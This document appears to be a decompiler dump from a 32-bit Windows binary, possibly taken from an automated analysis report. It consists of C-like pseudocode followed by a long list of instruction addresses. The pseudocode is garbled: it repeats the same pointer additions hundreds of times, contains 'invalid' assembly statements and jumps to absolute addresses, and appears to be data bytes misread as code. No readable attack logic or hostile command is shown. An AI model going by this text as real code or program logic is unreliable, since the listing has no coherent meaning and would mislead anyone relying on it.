				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t394 =  *_t394 + _t361;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				 *_t300 =  *_t300 + _t300;
				_t301 = _t300 |  *_t300;
				 *(_t301 + _t301) =  *(_t301 + _t301) | _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *_t301 =  *_t301 + _t301;
				 *((intOrPtr*)(_t301 + 0x1c)) =  *((intOrPtr*)(_t301 + 0x1c)) + _t380;
				_t302 = _t301 + 1;
				 *((intOrPtr*)(_t302 - 0x10)) =  *((intOrPtr*)(_t302 - 0x10)) + _t373;
				 *_t302 =  *_t302 ^ _t302;
				_t362 = _t361 + _t361;
				asm("invalid");
				 *_t302 =  *_t302 | _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				 *_t302 =  *_t302 + _t302;
				_t303 = _t302 +  *_t302;
				 *_t303 =  *_t303 + _t303;
				goto 0x74401a29;
				asm("sbb al, [eax]");
				_t304 = _t303 + 1;
				 *(_t380 + _t380) =  *(_t380 + _t380) + _t304;
				_t305 = _t304 + 1;
				 *_t305 =  *_t305 + _t362;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305;
				 *((intOrPtr*)(_t362 - 0x74000000)) =  *((intOrPtr*)(_t362 - 0x74000000)) + _t373;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) =  *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) + _t373;
				_t395 = _t394 - 1;
				_t411 = _t409 + 2;
				_push(_t362);
				_t196 = _t373 + 0x66;
				 *_t196 =  *((intOrPtr*)(_t373 + 0x66)) + _t305;
				_t498 =  *_t196;
				if(_t498 == 0) {
					L110:
					_t411 = _t305;
					_t305 = _t387;
					asm("lodsb");
					 *_t305 =  *_t305 + _t305;
				} else {
					if(_t498 >= 0) {
						L109:
						 *(_t305 - 0x6a2845bf) =  *(_t305 - 0x6a2845bf) ^ _t373;
						goto L110;
					} else {
						_t423 =  *(_t411 + 0x74) * 0x73;
						 *_t305 =  *_t305 + _t305;
						asm("popad");
						asm("o16 jz 0x75");
						if( *_t305 < 0) {
							_t423 =  *(_t411 + 0x74) * 0x73;
							 *_t305 =  *_t305 + _t305;
							_push(_t305);
							 *_t305 =  *_t305 + _t305;
							 *((intOrPtr*)(_t411 - 0x50520f0c)) =  *((intOrPtr*)(_t411 - 0x50520f0c)) + _t362;
							_t325 = _t362;
							_t362 = _t305;
							 *(_t411 - 0x54) =  *(_t411 - 0x54) | 0x000000ed;
							_t305 = _t325 - 0xb9;
							 *((intOrPtr*)(_t380 + 0x12d4)) = cs;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							asm("sldt word [eax]");
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							asm("sbb al, [esi]");
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t305;
							_push(0x4c004012);
							 *_t305 =  *_t305 + _t305;
							 *_t305 =  *_t305 + _t380;
							 *_t305 =  *_t305 + _t305;
							 *(_t373 + 0x319e6237) =  *(_t373 + 0x319e6237) & _t362;
							goto L109;
						}
					}
				}
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t373 =  *_t373 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t362 + _t305 * 4)) =  *((intOrPtr*)(_t362 + _t305 * 4)) + _t373;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *((intOrPtr*)(_t305 + 0x38)) =  *((intOrPtr*)(_t305 + 0x38)) + _t362;
				_t307 = _t305 + 1;
				 *((intOrPtr*)(_t307 + _t307 + 0x10000)) =  *((intOrPtr*)(_t307 + _t307 + 0x10000)) + _t362;
				 *_t307 =  *_t307 + _t307;
				 *_t395 = ds;
				_t308 = _t307 + 1;
				 *_t308 =  *_t308 + _t308;
				 *_t308 =  *_t308 + _t308;
				 *((intOrPtr*)(_t308 - 0xffbf44)) =  *((intOrPtr*)(_t308 - 0xffbf44)) + _t380;
				asm("invalid");
				 *_t308 =  *_t308 + 1;
				 *_t308 =  *_t308 + _t308;
				 *_t308 =  *_t308 + _t380;
				_pop(ds);
				_t309 = _t308 + 1;
				 *((intOrPtr*)(_t309 + _t380 * 8)) =  *((intOrPtr*)(_t309 + _t380 * 8)) + _t362;
				_t310 = _t309 + 1;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				_t311 = _t310 + _t380;
				asm("sbb esi, [esi]");
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				 *_t362 = ds;
				_t312 = _t311 + 1;
				 *_t373 =  *_t373 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *((intOrPtr*)(_t411 + 0x40)) =  *((intOrPtr*)(_t411 + 0x40)) + _t380;
				 *_t312 =  *_t312 + _t312;
				 *_t362 = ds;
				_t313 = _t312 + 1;
				 *_t373 =  *_t373 + _t313;
				 *_t313 =  *_t313 + _t313;
				 *((intOrPtr*)(_t362 + _t362 + 0x40)) =  *((intOrPtr*)(_t362 + _t362 + 0x40)) + _t380;
				 *_t313 =  *_t313 + _t313;
				asm("sbb eax, [eax]");
				 *_t313 =  *_t313 + _t313;
				 *_t313 =  *_t313 + _t313;
				_t314 = _t423;
				asm("sbb eax, [eax]");
				 *_t314 =  *_t314 + _t314;
				asm("sbb eax, [eax]");
				asm("movsb");
				asm("aad 0x40");
				 *_t314 =  *_t314 + _t314;
				 *_t314 =  *_t314 + _t314;
				_t315 = _t314 + 1;
				_t396 = 0xbc006c00;
				if (_t315 != 0) goto L112;
				asm("les esp, [0x25d40040]");
				_t316 = _t315 + 1;
				 *_t316 =  *_t316 + _t316;
				_pop(ds);
				 *((intOrPtr*)(_t316 + _t316)) =  *((intOrPtr*)(_t316 + _t316)) + _t380;
				 *_t316 =  *_t316 + _t316;
				asm("adc al, 0x21");
				_t317 = _t316 + 1;
				asm("invalid");
				 *_t317 =  *_t317 + 1;
				 *_t317 =  *_t317 + _t317;
				 *_t317 =  *_t317 + _t317;
				 *_t317 =  *_t317 + _t317;
				 *0x64400044 =  *((intOrPtr*)(0x64400044)) + 1;
				if ( *((intOrPtr*)(0x64400044)) == 0) goto L113;
				_t319 = (_t317 & 0x00000021) + 1;
				asm("invalid");
				 *_t319 =  *_t319 + 1;
				 *_t319 =  *_t319 + _t319;
				 *0x1B140048 =  *((intOrPtr*)(0x1b140048)) + _t380;
				asm("adc [eax], eax");
				_t322 = _t319 + 0x14;
				 *((intOrPtr*)(_t380 + 4)) =  *((intOrPtr*)(_t380 + 4)) + _t373;
				asm("adc al, [eax]");
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				 *_t322 =  *_t322 + _t322;
				asm("hlt");
				 *_t322 =  *_t322 + _t322;
				 *((intOrPtr*)(_t396 + 0x44)) =  *((intOrPtr*)(_t396 + 0x44)) + _t373;
				_push(ds);
				_t323 = _t322 + 1;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *((intOrPtr*)(_t323 - 0x43)) =  *((intOrPtr*)(_t323 - 0x43)) + _t323;
				_t324 = _t323 + 1;
				 *_t324 =  *_t324 + _t324;
				return _t324;
			}































































































































                          0x00401218
                          0x00401218
                          0x00401218
                          0x0040121d
                          0x00401222
                          0x00401224
                          0x00401226
                          0x00401228
                          0x0040122a
                          0x0040122c
                          0x0040122d
                          0x0040122f
                          0x00401231
                          0x00401233
                          0x00401235
                          0x00401237
                          0x00401238
                          0x00401239
                          0x0040123b
                          0x0040123c
                          0x0040123c
                          0x0040123d
                          0x00401242
                          0x00401243
                          0x00401245
                          0x00401247
                          0x00401249
                          0x0040124b
                          0x0040124d
                          0x0040124f
                          0x00401252
                          0x00401254
                          0x00401255
                          0x00401258
                          0x004012c5
                          0x004012c5
                          0x004012c6
                          0x0040125a
                          0x0040125e
                          0x00401260
                          0x00401262
                          0x00401264
                          0x00401266
                          0x00401268
                          0x0040126a
                          0x0040126c
                          0x0040126d
                          0x00401272
                          0x00401272
                          0x00401273
                          0x00401277
                          0x00401279
                          0x0040127f
                          0x00401280
                          0x00401283
                          0x00401285
                          0x0040128a
                          0x0040128c
                          0x00401290
                          0x00401291
                          0x00401292
                          0x00401294
                          0x0040129a
                          0x0040129b
                          0x004012a1
                          0x004012a3
                          0x004012a5
                          0x004012a7
                          0x004012a9
                          0x004012ab
                          0x004012ad
                          0x004012af
                          0x004012b1
                          0x004012b3
                          0x004012b5
                          0x004012b7
                          0x004012b9
                          0x004012bb
                          0x004012bd
                          0x004012bf
                          0x004012c1
                          0x00000000
                          0x004012c1
                          0x00401283
                          0x004012c8
                          0x004012ca
                          0x004012cc
                          0x004012cd
                          0x004012cf
                          0x00401347
                          0x00401347
                          0x00401347
                          0x00401349
                          0x0040134a
                          0x00000000
                          0x0040134c
                          0x0040134c
                          0x00401350
                          0x00401351
                          0x00401353
                          0x00401355
                          0x00401358
                          0x0040135b
                          0x0040135d
                          0x00401362
                          0x00401363
                          0x00401366
                          0x00401368
                          0x0040136a
                          0x0040136c
                          0x0040136e
                          0x00401370
                          0x00401375
                          0x00401376
                          0x00401379
                          0x0040137b
                          0x00401386
                          0x0040138d
                          0x0040138f
                          0x00401391
                          0x00401394
                          0x00401396
                          0x00000000
                          0x00401396
                          0x00401351
                          0x004012d2
                          0x004012d2
                          0x004012d4
                          0x004012d5
                          0x004012d8
                          0x004012dd
                          0x004012de
                          0x004012df
                          0x004012e1
                          0x004012ea
                          0x004012ec
                          0x004012ed
                          0x004012f0
                          0x004012f3
                          0x004012f4
                          0x004012f6
                          0x00401301
                          0x00401303
                          0x00401306
                          0x00401309
                          0x0040130b
                          0x0040130b
                          0x0040130c
                          0x00401311
                          0x00401312
                          0x00401314
                          0x00401317
                          0x00401319
                          0x0040131f
                          0x00401320
                          0x00401323
                          0x00401323
                          0x00401329
                          0x0040139f
                          0x0040139f
                          0x004013a0
                          0x004013a3
                          0x00000000
                          0x0040132c
                          0x0040132c
                          0x00401397
                          0x00401397
                          0x00401399
                          0x0040139b
                          0x0040139d
                          0x00000000
                          0x0040132e
                          0x0040132e
                          0x004013a4
                          0x004013a4
                          0x004013a7
                          0x004013aa
                          0x004013ac
                          0x004013af
                          0x004013b4
                          0x004013b6
                          0x004013bc
                          0x004013be
                          0x004013c1
                          0x004013c1
                          0x004013c1
                          0x004013c2
                          0x004013c4
                          0x00401331
                          0x00401335
                          0x00401339
                          0x0040133a
                          0x0040133f
                          0x00401341
                          0x00401343
                          0x00401345
                          0x00000000
                          0x00401345
                          0x0040132e
                          0x0040132c
                          0x00401329
                          0x004013c7
                          0x004013c9
                          0x004013ce
                          0x004013cf
                          0x004013d0
                          0x004013d1
                          0x004013d2
                          0x004013d3
                          0x004013d4
                          0x004013d6
                          0x004013d8
                          0x004013db
                          0x004013dc
                          0x004013e3
                          0x004013e9
                          0x004013ec
                          0x004013f0
                          0x004013f2
                          0x004013f4
                          0x004013f6
                          0x004013f7
                          0x004013f9
                          0x004013fa
                          0x00401475
                          0x00401475
                          0x0040147b
                          0x0040147d
                          0x0040147e
                          0x00000000
                          0x004013fc
                          0x004013fc
                          0x004013ff
                          0x00401408
                          0x00401408
                          0x00401408
                          0x0040140b
                          0x0040140c
                          0x0040140e
                          0x0040140f
                          0x0040147f
                          0x0040147f
                          0x00401481
                          0x00401482
                          0x00401484
                          0x00401486
                          0x00000000
                          0x00401411
                          0x00401411
                          0x00401488
                          0x00401488
                          0x00401488
                          0x00401489
                          0x004014f7
                          0x00000000
                          0x0040148b
                          0x0040148b
                          0x00401506
                          0x00401508
                          0x0040150f
                          0x00401514
                          0x00401515
                          0x00401516
                          0x00401518
                          0x0040151a
                          0x0040151a
                          0x0040151a
                          0x0040151d
                          0x00000000
                          0x0040151f
                          0x0040151f
                          0x00401522
                          0x00000000
                          0x00401524
                          0x00401524
                          0x0040152b
                          0x0040152d
                          0x0040152f
                          0x00401532
                          0x00401539
                          0x0040153b
                          0x00401541
                          0x00401544
                          0x00401546
                          0x00401549
                          0x0040154a
                          0x0040154b
                          0x0040154f
                          0x00401550
                          0x00401551
                          0x00401552
                          0x00000000
                          0x00401555
                          0x00401555
                          0x00401555
                          0x00401559
                          0x0040155b
                          0x00000000
                          0x0040155b
                          0x00000000
                          0x00401559
                          0x00401552
                          0x00401522
                          0x0040148d
                          0x0040148d
                          0x00000000
                          0x0040148f
                          0x0040148f
                          0x004014ff
                          0x004014ff
                          0x00401500
                          0x00000000
                          0x00401491
                          0x00401491
                          0x004014f9
                          0x004014f9
                          0x004014fa
                          0x004014fc
                          0x00000000
                          0x00401494
                          0x00401494
                          0x00401496
                          0x00401498
                          0x00401499
                          0x0040149b
                          0x0040149e
                          0x00000000
                          0x0040149e
                          0x00401491
                          0x0040148f
                          0x0040148d
                          0x0040148b
                          0x00401413
                          0x00401413
                          0x00401416
                          0x00401418
                          0x0040141d
                          0x0040141e
                          0x0040141f
                          0x00401421
                          0x00401427
                          0x00401429
                          0x0040142b
                          0x00401431
                          0x00401432
                          0x00401433
                          0x00401434
                          0x00401435
                          0x00401436
                          0x00401438
                          0x0040143a
                          0x0040143a
                          0x0040143a
                          0x0040143d
                          0x004014a0
                          0x004014a0
                          0x004014a3
                          0x004014a8
                          0x004014a9
                          0x004014ab
                          0x004014ad
                          0x004014af
                          0x004014b1
                          0x00000000
                          0x0040143f
                          0x0040143f
                          0x00401440
                          0x00401442
                          0x004014b6
                          0x004014b6
                          0x004014b8
                          0x004014bb
                          0x004014bd
                          0x004014be
                          0x004014c0
                          0x004014c0
                          0x004014c3
                          0x004014c4
                          0x00000000
                          0x00401444
                          0x0040144b
                          0x0040144c
                          0x00401452
                          0x00401454
                          0x00401456
                          0x00401458
                          0x0040145a
                          0x0040145a
                          0x0040145a
                          0x0040145d
                          0x004014d3
                          0x004014d5
                          0x004014d7
                          0x004014d9
                          0x004014db
                          0x004014e1
                          0x004014e4
                          0x004014e5
                          0x004014e6
                          0x0040155c
                          0x0040155c
                          0x0040155e
                          0x0040155e
                          0x00401562
                          0x00401564
                          0x00401569
                          0x0040156a
                          0x0040156a
                          0x0040156a
                          0x0040156d
                          0x0040156e
                          0x004015e3
                          0x00000000
                          0x00401570
                          0x00401570
                          0x004015e4
                          0x004015e4
                          0x004015e4
                          0x004015e6
                          0x004015e7
                          0x004015e8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00401572
                          0x00401572
                          0x004015ea
                          0x004015ea
                          0x0040165e
                          0x0040165e
                          0x0040165f
                          0x00401661
                          0x00401665
                          0x00401667
                          0x0040166a
                          0x0040166d
                          0x0040166f
                          0x00401670
                          0x00401672
                          0x00401673
                          0x00401674
                          0x00401675
                          0x00401676
                          0x00401678
                          0x0040167b
                          0x0040167c
                          0x0040167d
                          0x0040167e
                          0x004015ec
                          0x004015ec
                          0x00401652
                          0x00401652
                          0x00401653
                          0x00401653
                          0x00401654
                          0x0040165b
                          0x0040165d
                          0x00000000
                          0x004015ee
                          0x004015ee
                          0x004015f0
                          0x004015f2
                          0x004015f4
                          0x004015f7
                          0x004015fa
                          0x004015fb
                          0x004015fc
                          0x00401604
                          0x00401605
                          0x00401606
                          0x00401608
                          0x0040160a
                          0x0040160c
                          0x0040160e
                          0x00401610
                          0x00401612
                          0x00401613
                          0x00401615
                          0x00401616
                          0x00401618
                          0x0040161a
                          0x0040161a
                          0x0040161e
                          0x00401621
                          0x00401622
                          0x00401626
                          0x0040162c
                          0x00401632
                          0x00401634
                          0x00401636
                          0x00401638
                          0x0040163a
                          0x0040163b
                          0x00401640
                          0x00401641
                          0x00401641
                          0x00401642
                          0x00401643
                          0x00401645
                          0x0040164b
                          0x0040164c
                          0x0040164d
                          0x00401650
                          0x00401651
                          0x00000000
                          0x00401651
                          0x0040161e
                          0x004015ec
                          0x00401575
                          0x00401575
                          0x00401578
                          0x0040157b
                          0x00401581
                          0x00401584
                          0x00401584
                          0x00401589
                          0x0040158b
                          0x0040158e
                          0x00401593
                          0x00401594
                          0x00401594
                          0x00401596
                          0x00401598
                          0x0040159c
                          0x0040159e
                          0x004015a0
                          0x004015a1
                          0x004015a3
                          0x004015a9
                          0x004015aa
                          0x004015ab
                          0x004015b1
                          0x004015b3
                          0x004015b6
                          0x004015b7
                          0x004015b9
                          0x004015bc
                          0x004015be
                          0x004015c0
                          0x004015c0
                          0x004015c0
                          0x00401572
                          0x00401570
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040145f
                          0x0040145f
                          0x004014c6
                          0x004014c6
                          0x00401461
                          0x00401461
                          0x00401462
                          0x0040146a
                          0x0040146a
                          0x0040146a
                          0x0040146d
                          0x004014e8
                          0x004014e8
                          0x004014ed
                          0x004014ef
                          0x004014ef
                          0x004014ef
                          0x004014f2
                          0x004014f4
                          0x004014f4
                          0x0040146f
                          0x0040146f
                          0x00401470
                          0x00401473
                          0x00000000
                          0x00401473
                          0x0040146d
                          0x0040145f
                          0x0040145d
                          0x00401442
                          0x0040143d
                          0x00401411
                          0x0040140f
                          0x00401682
                          0x00401684
                          0x00401685
                          0x00401686
                          0x00401688
                          0x00401689
                          0x0040168b
                          0x0040168d
                          0x0040168f
                          0x00401691
                          0x00401697
                          0x0040169c
                          0x0040169e
                          0x0040169e
                          0x004016a1
                          0x004016a2
                          0x004016a5
                          0x00401717
                          0x00401717
                          0x00401718
                          0x0040171d
                          0x0040171f
                          0x00401721
                          0x00401724
                          0x00401726
                          0x00401728
                          0x0040172b
                          0x0040172d
                          0x00401734
                          0x00000000
                          0x004016a7
                          0x004016a7
                          0x004016a8
                          0x004016a9
                          0x004016ac
                          0x004016b4
                          0x004016b6
                          0x004016b8
                          0x004016bb
                          0x004016bd
                          0x004016bd
                          0x004016c2
                          0x004016c6
                          0x004016c7
                          0x00401739
                          0x00401739
                          0x0040173a
                          0x0040173b
                          0x00000000
                          0x004016cb
                          0x004016cb
                          0x00401735
                          0x00401735
                          0x00401738
                          0x00000000
                          0x004016cf
                          0x004016cf
                          0x004016d0
                          0x0040173d
                          0x0040173d
                          0x00401741
                          0x00000000
                          0x004016d2
                          0x004016d2
                          0x004016d4
                          0x004016d5
                          0x004016e0
                          0x004016e1
                          0x004016e6
                          0x004016e9
                          0x004016eb
                          0x004016f1
                          0x004016f3
                          0x004016f6
                          0x004016f8
                          0x004016fd
                          0x004016fe
                          0x004016ff
                          0x00401701
                          0x00401703
                          0x00401703
                          0x00401703
                          0x00401706
                          0x00401707
                          0x0040170f
                          0x00401711
                          0x00401713
                          0x00000000
                          0x00401713
                          0x00401745
                          0x00401745
                          0x0040174b
                          0x0040174c
                          0x00401750
                          0x00401752
                          0x00401759
                          0x00401760
                          0x00401761
                          0x00401762
                          0x00401763
                          0x00401764
                          0x00401765
                          0x00401766
                          0x00401767
                          0x00401768
                          0x0040176e
                          0x00401770
                          0x00401775
                          0x00401777
                          0x00401779
                          0x0040177b
                          0x0040177b
                          0x0040170f
                          0x004016d0
                          0x004016cb
                          0x004016c7
                          0x0040177c
                          0x0040177e
                          0x0040177f
                          0x00401783
                          0x00401784
                          0x00401786
                          0x0040178a
                          0x0040178b
                          0x0040178c
                          0x0040178d
                          0x00401793
                          0x00401797
                          0x00401799
                          0x0040179b
                          0x0040179d
                          0x0040179f
                          0x004017a1
                          0x004017a1
                          0x004017a3
                          0x0040180a
                          0x0040180a
                          0x0040180c
                          0x0040180d
                          0x0040180e
                          0x0040180f
                          0x00000000
                          0x004017a5
                          0x004017a5
                          0x00401810
                          0x00401810
                          0x00401811
                          0x00401812
                          0x00401814
                          0x00401817
                          0x00401818
                          0x00401819
                          0x00401820
                          0x00401821
                          0x00401824
                          0x00401829
                          0x0040182a
                          0x0040182b
                          0x0040182c
                          0x0040182d
                          0x00401830
                          0x00401832
                          0x00401834
                          0x00401836
                          0x00401837
                          0x00401837
                          0x00401839
                          0x0040183a
                          0x0040183e
                          0x00401841
                          0x00401842
                          0x00401844
                          0x00000000
                          0x00401844
                          0x004017a7
                          0x004017a7
                          0x00000000
                          0x004017a9
                          0x004017a9
                          0x004017ad
                          0x004017af
                          0x004017b1
                          0x004017b5
                          0x004017b8
                          0x004017b9
                          0x004017ba
                          0x004017bb
                          0x004017c3
                          0x004017c4
                          0x004017c5
                          0x004017c6
                          0x004017c8
                          0x004017ca
                          0x004017cc
                          0x004017ce
                          0x004017d1
                          0x004017d1
                          0x004017d1
                          0x004017d4
                          0x004017d5
                          0x00401846
                          0x0040184b
                          0x0040184f
                          0x00401850
                          0x00401855
                          0x0040185e
                          0x00401860
                          0x00401861
                          0x00401862
                          0x00401865
                          0x00401866
                          0x00401867
                          0x0040186c
                          0x0040186f
                          0x00401870
                          0x00401871
                          0x00401872
                          0x00401878
                          0x00401879
                          0x0040187c
                          0x0040187e
                          0x00401880
                          0x00401883
                          0x00401885
                          0x00401887
                          0x0040188e
                          0x0040188f
                          0x00401896
                          0x00401898
                          0x0040189a
                          0x0040189c
                          0x0040189e
                          0x004018a0
                          0x004018a2
                          0x004018a4
                          0x004017d7
                          0x004017d7
                          0x004017d8
                          0x00401845
                          0x00401845
                          0x00000000
                          0x004017da
                          0x004017da
                          0x004017db
                          0x004017e2
                          0x004017e3
                          0x004017e5
                          0x004017e7
                          0x004017e9
                          0x004017eb
                          0x004017ed
                          0x004017ee
                          0x004017f4
                          0x004017f9
                          0x004017fb
                          0x004017fd
                          0x004017ff
                          0x00401801
                          0x00401806
                          0x00401807
                          0x00401808
                          0x00401809
                          0x00000000
                          0x00401809
                          0x004017d8
                          0x004017d5
                          0x004017a7
                          0x004017a5
                          0x004018a6
                          0x004018a7
                          0x004018ad
                          0x004018af
                          0x004018b1
                          0x004018b4
                          0x004018b6
                          0x004018b8
                          0x004018ba
                          0x004018bc
                          0x004018be
                          0x004018c0
                          0x004018c2
                          0x004018c3
                          0x004018c5
                          0x004018c7
                          0x004018ce
                          0x004018d0
                          0x004018d2
                          0x004018d4
                          0x004018d6
                          0x004018d8
                          0x004018da
                          0x004018dd
                          0x004018de
                          0x004018df
                          0x004018e1
                          0x004018e4
                          0x004018e6
                          0x004018e8
                          0x004018e9
                          0x004018ee
                          0x004018f0
                          0x004018f2
                          0x004018f4
                          0x004018f6
                          0x004018f8
                          0x004018f9
                          0x004018fc
                          0x00401900
                          0x00401902
                          0x00401903
                          0x00401905
                          0x00401907
                          0x00401909
                          0x0040190b
                          0x0040190d
                          0x0040190f
                          0x00401911
                          0x00401913
                          0x00401916
                          0x00401917
                          0x0040191a
                          0x0040191b
                          0x0040191d
                          0x0040191f
                          0x00401925
                          0x00401927
                          0x00401929
                          0x0040192b
                          0x0040192d
                          0x0040192f
                          0x00401932
                          0x00401933
                          0x00401935
                          0x00401938
                          0x0040193a
                          0x0040193b
                          0x0040193d
                          0x0040193f
                          0x00401941
                          0x00401943
                          0x00401945
                          0x00401947
                          0x00401949
                          0x0040194b
                          0x00401951
                          0x00401954
                          0x00401956
                          0x00401958
                          0x0040195f
                          0x00401961
                          0x00401963
                          0x00401965
                          0x00401967
                          0x0040196b
                          0x0040196d
                          0x00401973
                          0x00401975
                          0x00401977
                          0x00401979
                          0x0040197b
                          0x0040197d
                          0x0040197f
                          0x00401981
                          0x00401985
                          0x00401986
                          0x00401987
                          0x0040198a
                          0x0040198b
                          0x0040198d
                          0x0040198f
                          0x00401995
                          0x00401997
                          0x00401999
                          0x0040199b
                          0x0040199d
                          0x0040199f
                          0x004019a6
                          0x004019a7
                          0x004019ae
                          0x004019b0
                          0x004019b2
                          0x004019b4
                          0x004019b6
                          0x004019b8
                          0x004019ba
                          0x004019bc
                          0x004019be
                          0x004019bf
                          0x004019c2
                          0x004019c3
                          0x004019c5
                          0x004019c7
                          0x004019c9
                          0x004019ce
                          0x004019d0
                          0x004019d2
                          0x004019d4
                          0x004019d6
                          0x004019d8
                          0x004019db
                          0x004019de
                          0x004019e3
                          0x004019e5
                          0x004019e7
                          0x004019e9
                          0x004019eb
                          0x004019ed
                          0x004019ef
                          0x004019f2
                          0x004019f4
                          0x004019f6
                          0x004019f8
                          0x004019fa
                          0x004019fc
                          0x004019fe
                          0x00401a00
                          0x00401a03
                          0x00401a05
                          0x00401a07
                          0x00401a09
                          0x00401a0b
                          0x00401a0e
                          0x00401a0f
                          0x00401a12
                          0x00401a14
                          0x00401a16
                          0x00401a18
                          0x00401a1a
                          0x00401a1c
                          0x00401a1e
                          0x00401a20
                          0x00401a22
                          0x00401a24
                          0x00401a29
                          0x00401a2e
                          0x00401a2f
                          0x00401a32
                          0x00401a33
                          0x00401a36
                          0x00401a38
                          0x00401a3b
                          0x00401a41
                          0x00401a43
                          0x00401a45
                          0x00401a47
                          0x00401a49
                          0x00401a4b
                          0x00401a4d
                          0x00401a4f
                          0x00401a51
                          0x00401a53
                          0x00401a58
                          0x00401a59
                          0x00401a5a
                          0x00401a5b
                          0x00401a5b
                          0x00401a5b
                          0x00401a5e
                          0x00401ad2
                          0x00401ad2
                          0x00401ad3
                          0x00401ad4
                          0x00401ad8
                          0x00401a60
                          0x00401a60
                          0x00401acd
                          0x00401acd
